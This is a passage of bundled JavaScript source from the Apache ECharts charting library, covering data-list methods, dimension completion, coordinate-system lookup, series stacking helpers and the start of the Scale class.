this.seriesIndex;\n    child.dataIndex = this.dataIndex;\n    child.dataType = this.dataType;\n};\n/**\n * Set graphic element relative to data. It can be set as null\n * @param {number} idx\n * @param {module:zrender/Element} [el]\n */\nlistProto.setItemGraphicEl = function (idx, el) {\n    var hostModel = this.hostModel;\n\n    if (el) {\n        // Add data index and series index for indexing the data by element\n        // Useful in tooltip\n        el.dataIndex = idx;\n        el.dataType = this.dataType;\n        el.seriesIndex = hostModel && hostModel.seriesIndex;\n        if (el.type === 'group') {\n            el.traverse(setItemDataAndSeriesIndex, el);\n        }\n    }\n\n    this._graphicEls[idx] = el;\n};\n\n/**\n * @param {number} idx\n * @return {module:zrender/Element}\n */\nlistProto.getItemGraphicEl = function (idx) {\n    return this._graphicEls[idx];\n};\n\n/**\n * @param {Function} cb\n * @param {*} context\n */\nlistProto.eachItemGraphicEl = function (cb, context) {\n    each$1(this._graphicEls, function (el, idx) {\n        if (el) {\n            cb && cb.call(context, el, idx);\n        }\n    });\n};\n\n/**\n * Shallow clone a new list except visual and layout properties, and graph elements.\n * New list only change the indices.\n */\nlistProto.cloneShallow = function (list) {\n    if (!list) {\n        var dimensionInfoList = map(this.dimensions, this.getDimensionInfo, this);\n        list = new List(dimensionInfoList, this.hostModel);\n    }\n\n    // FIXME\n    list._storage = this._storage;\n\n    transferProperties(list, this);\n\n    // Clone will not change the data extent and indices\n    if (this._indices) {\n        var Ctor = this._indices.constructor;\n        list._indices = new Ctor(this._indices);\n    }\n    else {\n        list._indices = null;\n    }\n    list.getRawIndex = list._indices ? getRawIndexWithIndices : getRawIndexWithoutIndices;\n\n    return list;\n};\n\n/**\n * Wrap some method to add more feature\n * @param {string} methodName\n * @param {Function} injectFunction\n */\nlistProto.wrapMethod = function (methodName, injectFunction) {\n    var originalMethod = this[methodName];\n    if (typeof originalMethod !== 'function') {\n        return;\n    }\n    this.__wrappedMethods = this.__wrappedMethods || [];\n    this.__wrappedMethods.push(methodName);\n    this[methodName] = function () {\n        var res = originalMethod.apply(this, arguments);\n        return injectFunction.apply(this, [res].concat(slice(arguments)));\n    };\n};\n\n// Methods that create a new list based on this list should be listed here.\n// Notice that those method should `RETURN` the new list.\nlistProto.TRANSFERABLE_METHODS = ['cloneShallow', 'downSample', 'map'];\n// Methods that change indices of this list should be listed here.\nlistProto.CHANGABLE_METHODS = ['filterSelf', 'selectRange'];\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * @deprecated\n * Use `echarts/data/helper/createDimensions` instead.\n */\n\n/**\n * @see {module:echarts/test/ut/spec/data/completeDimensions}\n *\n * This method builds the relationship between:\n * + \"what the coord sys or series requires (see `sysDims`)\",\n * + \"what the user defines (in `encode` and `dimensions`, see `opt.dimsDef` and `opt.encodeDef`)\"\n * + \"what the data source provids (see `source`)\".\n *\n * Some guess strategy will be adapted if user does not define something.\n * If no 'value' dimension specified, the first no-named dimension will be\n * named as 'value'.\n *\n * @param {Array.<string>} sysDims Necessary dimensions, like ['x', 'y'], which\n *      provides not only dim template, but also default order.\n *      properties: 'name', 'type', 'displayName'.\n *      `name` of each item provides default coord name.\n *      [{dimsDef: [string|Object, ...]}, ...] dimsDef of sysDim item provides default dim name, and\n *                                    provide dims count that the sysDim required.\n *      [{ordinalMeta}] can be specified.\n * @param {module:echarts/data/Source|Array|Object} source or data (for compatibal with pervious)\n * @param {Object} [opt]\n * @param {Array.<Object|string>} [opt.dimsDef] option.series.dimensions User defined dimensions\n *      For example: ['asdf', {name, type}, ...].\n * @param {Object|HashMap} [opt.encodeDef] option.series.encode {x: 2, y: [3, 1], tooltip: [1, 2], label: 3}\n * @param {Function} [opt.encodeDefaulter] Called if no `opt.encodeDef` exists.\n *      If not specified, auto find the next available data dim.\n *      param source {module:data/Source}\n *      param dimCount {number}\n *      return {Object} encode Never be `null/undefined`.\n * @param {string} [opt.generateCoord] Generate coord dim with the given name.\n *      If not specified, extra dim names will be:\n *      'value', 'value0', 'value1', ...\n * @param {number} [opt.generateCoordCount] By default, the generated dim name is `generateCoord`.\n *      If `generateCoordCount` specified, the generated dim names will be:\n *      `generateCoord` + 0, `generateCoord` + 1, ...\n *      can be Infinity, indicate that use all of the remain columns.\n * @param {number} [opt.dimCount] If not specified, guess by the first data item.\n * @return {Array.<module:data/DataDimensionInfo>}\n */\nfunction completeDimensions(sysDims, source, opt) {\n    if (!Source.isInstance(source)) {\n        source = Source.seriesDataToSource(source);\n    }\n\n    opt = opt || {};\n    sysDims = (sysDims || []).slice();\n    var dimsDef = (opt.dimsDef || []).slice();\n    var dataDimNameMap = createHashMap();\n    var coordDimNameMap = createHashMap();\n    // var valueCandidate;\n    var result = [];\n\n    var dimCount = getDimCount(source, sysDims, dimsDef, opt.dimCount);\n\n    // Apply user defined dims (`name` and `type`) and init result.\n    for (var i = 0; i < dimCount; i++) {\n        var dimDefItem = dimsDef[i] = extend(\n            {}, isObject$1(dimsDef[i]) ? dimsDef[i] : {name: dimsDef[i]}\n        );\n        var userDimName = dimDefItem.name;\n        var resultItem = result[i] = new DataDimensionInfo();\n        // Name will be applied later for avoiding duplication.\n        if (userDimName != null && dataDimNameMap.get(userDimName) == null) {\n            // Only if `series.dimensions` is defined in option\n            // displayName, will be set, and dimension will be diplayed vertically in\n            // tooltip by default.\n            resultItem.name = resultItem.displayName = userDimName;\n            dataDimNameMap.set(userDimName, i);\n        }\n        dimDefItem.type != null && (resultItem.type = dimDefItem.type);\n        dimDefItem.displayName != null && (resultItem.displayName = dimDefItem.displayName);\n    }\n\n    var encodeDef = opt.encodeDef;\n    if (!encodeDef && opt.encodeDefaulter) {\n        encodeDef = opt.encodeDefaulter(source, dimCount);\n    }\n    encodeDef = createHashMap(encodeDef);\n\n    // Set `coordDim` and `coordDimIndex` by `encodeDef` and normalize `encodeDef`.\n    encodeDef.each(function (dataDims, coordDim) {\n        dataDims = normalizeToArray(dataDims).slice();\n\n        // Note: It is allowed that `dataDims.length` is `0`, e.g., options is\n        // `{encode: {x: -1, y: 1}}`. Should not filter anything in\n        // this case.\n        if (dataDims.length === 1 && !isString(dataDims[0]) && dataDims[0] < 0) {\n            encodeDef.set(coordDim, false);\n            return;\n        }\n\n        var validDataDims = encodeDef.set(coordDim, []);\n        each$1(dataDims, function (resultDimIdx, idx) {\n            // The input resultDimIdx can be dim name or index.\n            isString(resultDimIdx) && (resultDimIdx = dataDimNameMap.get(resultDimIdx));\n            if (resultDimIdx != null && resultDimIdx < dimCount) {\n                validDataDims[idx] = resultDimIdx;\n                applyDim(result[resultDimIdx], coordDim, idx);\n            }\n        });\n    });\n\n    // Apply templetes and default order from `sysDims`.\n    var availDimIdx = 0;\n    each$1(sysDims, function (sysDimItem, sysDimIndex) {\n        var coordDim;\n        var sysDimItem;\n        var sysDimItemDimsDef;\n        var sysDimItemOtherDims;\n        if (isString(sysDimItem)) {\n            coordDim = sysDimItem;\n            sysDimItem = {};\n        }\n        else {\n            coordDim = sysDimItem.name;\n            var ordinalMeta = sysDimItem.ordinalMeta;\n            sysDimItem.ordinalMeta = null;\n            sysDimItem = clone(sysDimItem);\n            sysDimItem.ordinalMeta = ordinalMeta;\n            // `coordDimIndex` should not be set directly.\n            sysDimItemDimsDef = sysDimItem.dimsDef;\n            sysDimItemOtherDims = sysDimItem.otherDims;\n            sysDimItem.name = sysDimItem.coordDim = sysDimItem.coordDimIndex =\n                sysDimItem.dimsDef = sysDimItem.otherDims = null;\n        }\n\n        var dataDims = encodeDef.get(coordDim);\n\n        // negative resultDimIdx means no need to mapping.\n        if (dataDims === false) {\n            return;\n        }\n\n        var dataDims = normalizeToArray(dataDims);\n\n        // dimensions provides default dim sequences.\n        if (!dataDims.length) {\n            for (var i = 0; i < (sysDimItemDimsDef && sysDimItemDimsDef.length || 1); i++) {\n                while (availDimIdx < result.length && result[availDimIdx].coordDim != null) {\n                    availDimIdx++;\n                }\n                availDimIdx < result.length && dataDims.push(availDimIdx++);\n            }\n        }\n\n        // Apply templates.\n        each$1(dataDims, function (resultDimIdx, coordDimIndex) {\n            var resultItem = result[resultDimIdx];\n            applyDim(defaults(resultItem, sysDimItem), coordDim, coordDimIndex);\n            if (resultItem.name == null && sysDimItemDimsDef) {\n                var sysDimItemDimsDefItem = sysDimItemDimsDef[coordDimIndex];\n                !isObject$1(sysDimItemDimsDefItem) && (sysDimItemDimsDefItem = {name: sysDimItemDimsDefItem});\n                resultItem.name = resultItem.displayName = sysDimItemDimsDefItem.name;\n                resultItem.defaultTooltip = sysDimItemDimsDefItem.defaultTooltip;\n            }\n            // FIXME refactor, currently only used in case: {otherDims: {tooltip: false}}\n            sysDimItemOtherDims && defaults(resultItem.otherDims, sysDimItemOtherDims);\n        });\n    });\n\n    function applyDim(resultItem, coordDim, coordDimIndex) {\n        if (OTHER_DIMENSIONS.get(coordDim) != null) {\n            resultItem.otherDims[coordDim] = coordDimIndex;\n        }\n        else {\n            resultItem.coordDim = coordDim;\n            resultItem.coordDimIndex = coordDimIndex;\n            coordDimNameMap.set(coordDim, true);\n        }\n    }\n\n    // Make sure the first extra dim is 'value'.\n    var generateCoord = opt.generateCoord;\n    var generateCoordCount = opt.generateCoordCount;\n    var fromZero = generateCoordCount != null;\n    generateCoordCount = generateCoord ? (generateCoordCount || 1) : 0;\n    var extra = generateCoord || 'value';\n\n    // Set dim `name` and other `coordDim` and other props.\n    for (var resultDimIdx = 0; resultDimIdx < dimCount; resultDimIdx++) {\n        var resultItem = result[resultDimIdx] = result[resultDimIdx] || new DataDimensionInfo();\n        var coordDim = resultItem.coordDim;\n\n        if (coordDim == null) {\n            resultItem.coordDim = genName(\n                extra, coordDimNameMap, fromZero\n            );\n            resultItem.coordDimIndex = 0;\n            if (!generateCoord || generateCoordCount <= 0) {\n                resultItem.isExtraCoord = true;\n            }\n            generateCoordCount--;\n        }\n\n        resultItem.name == null && (resultItem.name = genName(\n            resultItem.coordDim,\n            dataDimNameMap\n        ));\n\n        if (resultItem.type == null\n            && (\n                guessOrdinal(source, resultDimIdx, resultItem.name) === BE_ORDINAL.Must\n                // Consider the case:\n                // {\n                //    dataset: {source: [\n                //        ['2001', 123],\n                //        ['2002', 456],\n                //        ...\n                //        ['The others', 987],\n                //    ]},\n                //    series: {type: 'pie'}\n                // }\n                // The first colum should better be treated as a \"ordinal\" although it\n                // might not able to be detected as an \"ordinal\" by `guessOrdinal`.\n                || (resultItem.isExtraCoord\n                    && (resultItem.otherDims.itemName != null\n                        || resultItem.otherDims.seriesName != null\n                    )\n                )\n            )\n        ) {\n            resultItem.type = 'ordinal';\n        }\n    }\n\n    return result;\n}\n\n// ??? TODO\n// Originally detect dimCount by data[0]. Should we\n// optimize it to only by sysDims and dimensions and encode.\n// So only necessary dims will be initialized.\n// But\n// (1) custom series should be considered. where other dims\n// may be visited.\n// (2) sometimes user need to calcualte bubble size or use visualMap\n// on other dimensions besides coordSys needed.\n// So, dims that is not used by system, should be shared in storage?\nfunction getDimCount(source, sysDims, dimsDef, optDimCount) {\n    // Note that the result dimCount should not small than columns count\n    // of data, otherwise `dataDimNameMap` checking will be incorrect.\n    var dimCount = Math.max(\n        source.dimensionsDetectCount || 1,\n        sysDims.length,\n        dimsDef.length,\n        optDimCount || 0\n    );\n    each$1(sysDims, function (sysDimItem) {\n        var sysDimItemDimsDef = sysDimItem.dimsDef;\n        sysDimItemDimsDef && (dimCount = Math.max(dimCount, sysDimItemDimsDef.length));\n    });\n    return dimCount;\n}\n\nfunction genName(name, map$$1, fromZero) {\n    if (fromZero || map$$1.get(name) != null) {\n        var i = 0;\n        while (map$$1.get(name + i) != null) {\n            i++;\n        }\n        name += i;\n    }\n    map$$1.set(name, true);\n    return name;\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * Substitute `completeDimensions`.\n * `completeDimensions` is to be deprecated.\n */\n/**\n * @param {module:echarts/data/Source|module:echarts/data/List} source or data.\n * @param {Object|Array} [opt]\n * @param {Array.<string|Object>} [opt.coordDimensions=[]]\n * @param {number} [opt.dimensionsCount]\n * @param {string} [opt.generateCoord]\n * @param {string} [opt.generateCoordCount]\n * @param {Array.<string|Object>} [opt.dimensionsDefine=source.dimensionsDefine] Overwrite source define.\n * @param {Object|HashMap} [opt.encodeDefine=source.encodeDefine] Overwrite source define.\n * @param {Function} [opt.encodeDefaulter] Make default encode if user not specified.\n * @return {Array.<Object>} dimensionsInfo\n */\nvar createDimensions = function (source, opt) {\n    opt = opt || {};\n    return completeDimensions(opt.coordDimensions || [], source, {\n        dimsDef: opt.dimensionsDefine || source.dimensionsDefine,\n        encodeDef: opt.encodeDefine || source.encodeDefine,\n        dimCount: opt.dimensionsCount,\n        encodeDefaulter: opt.encodeDefaulter,\n        generateCoord: opt.generateCoord,\n        generateCoordCount: opt.generateCoordCount\n    });\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * Helper for model references.\n * There are many manners to refer axis/coordSys.\n */\n\n// TODO\n// merge relevant logic to this file?\n// check: \"modelHelper\" of tooltip and \"BrushTargetManager\".\n\n/**\n * @class\n * For example:\n * {\n *     coordSysName: 'cartesian2d',\n *     coordSysDims: ['x', 'y', ...],\n *     axisMap: HashMap({\n *         x: xAxisModel,\n *         y: yAxisModel\n *     }),\n *     categoryAxisMap: HashMap({\n *         x: xAxisModel,\n *         y: undefined\n *     }),\n *     // The index of the first category axis in `coordSysDims`.\n *     // `null/undefined` means no category axis exists.\n *     firstCategoryDimIndex: 1,\n *     // To replace user specified encode.\n * }\n */\nfunction CoordSysInfo(coordSysName) {\n    /**\n     * @type {string}\n     */\n    this.coordSysName = coordSysName;\n    /**\n     * @type {Array.<string>}\n     */\n    this.coordSysDims = [];\n    /**\n     * @type {module:zrender/core/util#HashMap}\n     */\n    this.axisMap = createHashMap();\n    /**\n     * @type {module:zrender/core/util#HashMap}\n     */\n    this.categoryAxisMap = createHashMap();\n    /**\n     * @type {number}\n     */\n    this.firstCategoryDimIndex = null;\n}\n\n/**\n * @return {module:model/referHelper#CoordSysInfo}\n */\nfunction getCoordSysInfoBySeries(seriesModel) {\n    var coordSysName = seriesModel.get('coordinateSystem');\n    var result = new CoordSysInfo(coordSysName);\n    var fetch = fetchers[coordSysName];\n    if (fetch) {\n        fetch(seriesModel, result, result.axisMap, result.categoryAxisMap);\n        return result;\n    }\n}\n\nvar fetchers = {\n\n    cartesian2d: function (seriesModel, result, axisMap, categoryAxisMap) {\n        var xAxisModel = seriesModel.getReferringComponents('xAxis')[0];\n        var yAxisModel = seriesModel.getReferringComponents('yAxis')[0];\n\n        if (__DEV__) {\n            if (!xAxisModel) {\n                throw new Error('xAxis \"' + retrieve(\n                    seriesModel.get('xAxisIndex'),\n                    seriesModel.get('xAxisId'),\n                    0\n                ) + '\" not found');\n            }\n            if (!yAxisModel) {\n                throw new Error('yAxis \"' + retrieve(\n                    seriesModel.get('xAxisIndex'),\n                    seriesModel.get('yAxisId'),\n                    0\n                ) + '\" not found');\n            }\n        }\n\n        result.coordSysDims = ['x', 'y'];\n        axisMap.set('x', xAxisModel);\n        axisMap.set('y', yAxisModel);\n\n        if (isCategory(xAxisModel)) {\n            categoryAxisMap.set('x', xAxisModel);\n            result.firstCategoryDimIndex = 0;\n        }\n        if (isCategory(yAxisModel)) {\n            categoryAxisMap.set('y', yAxisModel);\n            result.firstCategoryDimIndex == null & (result.firstCategoryDimIndex = 1);\n        }\n    },\n\n    singleAxis: function (seriesModel, result, axisMap, categoryAxisMap) {\n        var singleAxisModel = seriesModel.getReferringComponents('singleAxis')[0];\n\n        if (__DEV__) {\n            if (!singleAxisModel) {\n                throw new Error('singleAxis should be specified.');\n            }\n        }\n\n        result.coordSysDims = ['single'];\n        axisMap.set('single', singleAxisModel);\n\n        if (isCategory(singleAxisModel)) {\n            categoryAxisMap.set('single', singleAxisModel);\n            result.firstCategoryDimIndex = 0;\n        }\n    },\n\n    polar: function (seriesModel, result, axisMap, categoryAxisMap) {\n        var polarModel = seriesModel.getReferringComponents('polar')[0];\n        var radiusAxisModel = polarModel.findAxisModel('radiusAxis');\n        var angleAxisModel = polarModel.findAxisModel('angleAxis');\n\n        if (__DEV__) {\n            if (!angleAxisModel) {\n                throw new Error('angleAxis option not found');\n            }\n            if (!radiusAxisModel) {\n                throw new Error('radiusAxis option not found');\n            }\n        }\n\n        result.coordSysDims = ['radius', 'angle'];\n        axisMap.set('radius', radiusAxisModel);\n        axisMap.set('angle', angleAxisModel);\n\n        if (isCategory(radiusAxisModel)) {\n            categoryAxisMap.set('radius', radiusAxisModel);\n            result.firstCategoryDimIndex = 0;\n        }\n        if (isCategory(angleAxisModel)) {\n            categoryAxisMap.set('angle', angleAxisModel);\n            result.firstCategoryDimIndex == null && (result.firstCategoryDimIndex = 1);\n        }\n    },\n\n    geo: function (seriesModel, result, axisMap, categoryAxisMap) {\n        result.coordSysDims = ['lng', 'lat'];\n    },\n\n    parallel: function (seriesModel, result, axisMap, categoryAxisMap) {\n        var ecModel = seriesModel.ecModel;\n        var parallelModel = ecModel.getComponent(\n            'parallel', seriesModel.get('parallelIndex')\n        );\n        var coordSysDims = result.coordSysDims = parallelModel.dimensions.slice();\n\n        each$1(parallelModel.parallelAxisIndex, function (axisIndex, index) {\n            var axisModel = ecModel.getComponent('parallelAxis', axisIndex);\n            var axisDim = coordSysDims[index];\n            axisMap.set(axisDim, axisModel);\n\n            if (isCategory(axisModel) && result.firstCategoryDimIndex == null) {\n                categoryAxisMap.set(axisDim, axisModel);\n                result.firstCategoryDimIndex = index;\n            }\n        });\n    }\n};\n\nfunction isCategory(axisModel) {\n    return axisModel.get('type') === 'category';\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * Note that it is too complicated to support 3d stack by value\n * (have to create two-dimension inverted index), so in 3d case\n * we just support that stacked by index.\n *\n * @param {module:echarts/model/Series} seriesModel\n * @param {Array.<string|Object>} dimensionInfoList The same as the input of <module:echarts/data/List>.\n *        The input dimensionInfoList will be modified.\n * @param {Object} [opt]\n * @param {boolean} [opt.stackedCoordDimension=''] Specify a coord dimension if needed.\n * @param {boolean} [opt.byIndex=false]\n * @return {Object} calculationInfo\n * {\n *     stackedDimension: string\n *     stackedByDimension: string\n *     isStackedByIndex: boolean\n *     stackedOverDimension: string\n *     stackResultDimension: string\n * }\n */\nfunction enableDataStack(seriesModel, dimensionInfoList, opt) {\n    opt = opt || {};\n    var byIndex = opt.byIndex;\n    var stackedCoordDimension = opt.stackedCoordDimension;\n\n    // Compatibal: when `stack` is set as '', do not stack.\n    var mayStack = !!(seriesModel && seriesModel.get('stack'));\n    var stackedByDimInfo;\n    var stackedDimInfo;\n    var stackResultDimension;\n    var stackedOverDimension;\n\n    each$1(dimensionInfoList, function (dimensionInfo, index) {\n        if (isString(dimensionInfo)) {\n            dimensionInfoList[index] = dimensionInfo = {name: dimensionInfo};\n        }\n\n        if (mayStack && !dimensionInfo.isExtraCoord) {\n            // Find the first ordinal dimension as the stackedByDimInfo.\n            if (!byIndex && !stackedByDimInfo && dimensionInfo.ordinalMeta) {\n                stackedByDimInfo = dimensionInfo;\n            }\n            // Find the first stackable dimension as the stackedDimInfo.\n            if (!stackedDimInfo\n                && dimensionInfo.type !== 'ordinal'\n                && dimensionInfo.type !== 'time'\n                && (!stackedCoordDimension || stackedCoordDimension === dimensionInfo.coordDim)\n            ) {\n                stackedDimInfo = dimensionInfo;\n            }\n        }\n    });\n\n    if (stackedDimInfo && !byIndex && !stackedByDimInfo) {\n        // Compatible with previous design, value axis (time axis) only stack by index.\n        // It may make sense if the user provides elaborately constructed data.\n        byIndex = true;\n    }\n\n    // Add stack dimension, they can be both calculated by coordinate system in `unionExtent`.\n    // That put stack logic in List is for using conveniently in echarts extensions, but it\n    // might not be a good way.\n    if (stackedDimInfo) {\n        // Use a weird name that not duplicated with other names.\n        stackResultDimension = '__\\0ecstackresult';\n        stackedOverDimension = '__\\0ecstackedover';\n\n        // Create inverted index to fast query index by value.\n        if (stackedByDimInfo) {\n            stackedByDimInfo.createInvertedIndices = true;\n        }\n\n        var stackedDimCoordDim = stackedDimInfo.coordDim;\n        var stackedDimType = stackedDimInfo.type;\n        var stackedDimCoordIndex = 0;\n\n        each$1(dimensionInfoList, function (dimensionInfo) {\n            if (dimensionInfo.coordDim === stackedDimCoordDim) {\n                stackedDimCoordIndex++;\n            }\n        });\n\n        dimensionInfoList.push({\n            name: stackResultDimension,\n            coordDim: stackedDimCoordDim,\n            coordDimIndex: stackedDimCoordIndex,\n            type: stackedDimType,\n            isExtraCoord: true,\n            isCalculationCoord: true\n        });\n\n        stackedDimCoordIndex++;\n\n        dimensionInfoList.push({\n            name: stackedOverDimension,\n            // This dimension contains stack base (generally, 0), so do not set it as\n            // `stackedDimCoordDim` to avoid extent calculation, consider log scale.\n            coordDim: stackedOverDimension,\n            coordDimIndex: stackedDimCoordIndex,\n            type: stackedDimType,\n            isExtraCoord: true,\n            isCalculationCoord: true\n        });\n    }\n\n    return {\n        stackedDimension: stackedDimInfo && stackedDimInfo.name,\n        stackedByDimension: stackedByDimInfo && stackedByDimInfo.name,\n        isStackedByIndex: byIndex,\n        stackedOverDimension: stackedOverDimension,\n        stackResultDimension: stackResultDimension\n    };\n}\n\n/**\n * @param {module:echarts/data/List} data\n * @param {string} stackedDim\n */\nfunction isDimensionStacked(data, stackedDim /*, stackedByDim*/) {\n    // Each single series only maps to one pair of axis. So we do not need to\n    // check stackByDim, whatever stacked by a dimension or stacked by index.\n    return !!stackedDim && stackedDim === data.getCalculationInfo('stackedDimension');\n        // && (\n        //     stackedByDim != null\n        //         ? stackedByDim === data.getCalculationInfo('stackedByDimension')\n        //         : data.getCalculationInfo('isStackedByIndex')\n        // );\n}\n\n/**\n * @param {module:echarts/data/List} data\n * @param {string} targetDim\n * @param {string} [stackedByDim] If not input this parameter, check whether\n *                                stacked by index.\n * @return {string} dimension\n */\nfunction getStackedDimension(data, targetDim) {\n    return isDimensionStacked(data, targetDim)\n        ? data.getCalculationInfo('stackResultDimension')\n        : targetDim;\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * @param {module:echarts/data/Source|Array} source Or raw data.\n * @param {module:echarts/model/Series} seriesModel\n * @param {Object} [opt]\n * @param {string} [opt.generateCoord]\n * @param {boolean} [opt.useEncodeDefaulter]\n */\nfunction createListFromArray(source, seriesModel, opt) {\n    opt = opt || {};\n\n    if (!Source.isInstance(source)) {\n        source = Source.seriesDataToSource(source);\n    }\n\n    var coordSysName = seriesModel.get('coordinateSystem');\n    var registeredCoordSys = CoordinateSystemManager.get(coordSysName);\n\n    var coordSysInfo = getCoordSysInfoBySeries(seriesModel);\n\n    var coordSysDimDefs;\n\n    if (coordSysInfo) {\n        coordSysDimDefs = map(coordSysInfo.coordSysDims, function (dim) {\n            var dimInfo = {name: dim};\n            var axisModel = coordSysInfo.axisMap.get(dim);\n            if (axisModel) {\n                var axisType = axisModel.get('type');\n                dimInfo.type = getDimensionTypeByAxis(axisType);\n                // dimInfo.stackable = isStackable(axisType);\n            }\n            return dimInfo;\n        });\n    }\n\n    if (!coordSysDimDefs) {\n        // Get dimensions from registered coordinate system\n        coordSysDimDefs = (registeredCoordSys && (\n            registeredCoordSys.getDimensionsInfo\n                ? registeredCoordSys.getDimensionsInfo()\n                : registeredCoordSys.dimensions.slice()\n        )) || ['x', 'y'];\n    }\n\n    var dimInfoList = createDimensions(source, {\n        coordDimensions: coordSysDimDefs,\n        generateCoord: opt.generateCoord,\n        encodeDefaulter: opt.useEncodeDefaulter\n            ? curry(makeSeriesEncodeForAxisCoordSys, coordSysDimDefs, seriesModel)\n            : null\n    });\n\n    var firstCategoryDimIndex;\n    var hasNameEncode;\n    coordSysInfo && each$1(dimInfoList, function (dimInfo, dimIndex) {\n        var coordDim = dimInfo.coordDim;\n        var categoryAxisModel = coordSysInfo.categoryAxisMap.get(coordDim);\n        if (categoryAxisModel) {\n            if (firstCategoryDimIndex == null) {\n                firstCategoryDimIndex = dimIndex;\n            }\n            dimInfo.ordinalMeta = categoryAxisModel.getOrdinalMeta();\n        }\n        if (dimInfo.otherDims.itemName != null) {\n            hasNameEncode = true;\n        }\n    });\n    if (!hasNameEncode && firstCategoryDimIndex != null) {\n        dimInfoList[firstCategoryDimIndex].otherDims.itemName = 0;\n    }\n\n    var stackCalculationInfo = enableDataStack(seriesModel, dimInfoList);\n\n    var list = new List(dimInfoList, seriesModel);\n\n    list.setCalculationInfo(stackCalculationInfo);\n\n    var dimValueGetter = (firstCategoryDimIndex != null && isNeedCompleteOrdinalData(source))\n        ? function (itemOpt, dimName, dataIndex, dimIndex) {\n            // Use dataIndex as ordinal value in categoryAxis\n            return dimIndex === firstCategoryDimIndex\n                ? dataIndex\n                : this.defaultDimValueGetter(itemOpt, dimName, dataIndex, dimIndex);\n        }\n        : null;\n\n    list.hasItemOption = false;\n    list.initData(source, null, dimValueGetter);\n\n    return list;\n}\n\nfunction isNeedCompleteOrdinalData(source) {\n    if (source.sourceFormat === SOURCE_FORMAT_ORIGINAL) {\n        var sampleItem = firstDataNotNull(source.data || []);\n        return sampleItem != null\n            && !isArray(getDataItemValue(sampleItem));\n    }\n}\n\nfunction firstDataNotNull(data) {\n    var i = 0;\n    while (i < data.length && data[i] == null) {\n        i++;\n    }\n    return data[i];\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * // Scale class management\n * @module echarts/scale/Scale\n */\n\n/**\n * @param {Object} [setting]\n */\nfunction Scale(setting) {\n    this._setting = setting || {};\n\n    /**\n     * Extent\n     * @type {Array.<number>}\n     * @protected\n     */\n    this._extent = [Infinity, -Infinity];\n\n    /**\n     * Step is calculated in adjustExtent\n     * @type {Array.<number>}\n     * @protected\n     */\n    this._interval = 0;\n\n    this.init && this.init.apply(this, arguments);\n}\n\n/**\n * Parse input val to valid inner number.\n * @param {*} val\n * @return {number}\n */\nScale.prototype.parse = function (val) {\n    // Notice: This would be a trap here, If the implementation\n    // of this method depends on extent, and this method is used\n    // before extent set (like in dataZoom), it would be wrong.\n    // Nevertheless, parse does not depend on extent generally.\n    return val;\n};\n\nScale.prototype.getSetting = function (name) {\n    return this._setting[name];\n};\n\nScale.prototype.contain = function (val) {\n    var extent = this._extent;\n    return val >= extent[0] && val <= extent[1];\n};\n\n/**\n * Normalize value to linear [0, 1], return 0.5 if extent span is 0\n * @param {number} val\n * @return {number}\n 